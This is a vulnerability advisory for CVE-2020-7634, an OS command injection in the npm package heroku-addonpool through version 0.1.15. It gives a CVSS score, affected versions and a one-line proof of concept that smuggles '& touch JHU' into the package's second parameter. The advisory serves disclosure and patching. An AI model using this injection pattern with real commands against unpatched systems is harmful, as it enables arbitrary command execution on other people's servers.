GHSA-3q9x-w53p-jg53

Suggest an improvement
Source
https://github.com/advisories/GHSA-3q9x-w53p-jg53
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-3q9x-w53p-jg53/GHSA-3q9x-w53p-jg53.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3q9x-w53p-jg53
Aliases
  • CVE-2020-7634
Published
2021-12-09T19:52:03Z
Modified
2023-11-08T04:04:01.774308Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
OS Command Injection in heroku-addonpool
Details

heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function HerokuAddonPool(id, app, opt) can be controlled by users without any sanitization.

PoC

var Root = require("heroku-addonpool");
var root = Root("sss", "& touch JHU", {});
root.setup();
References

Affected packages

npm / heroku-addonpool

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.1.16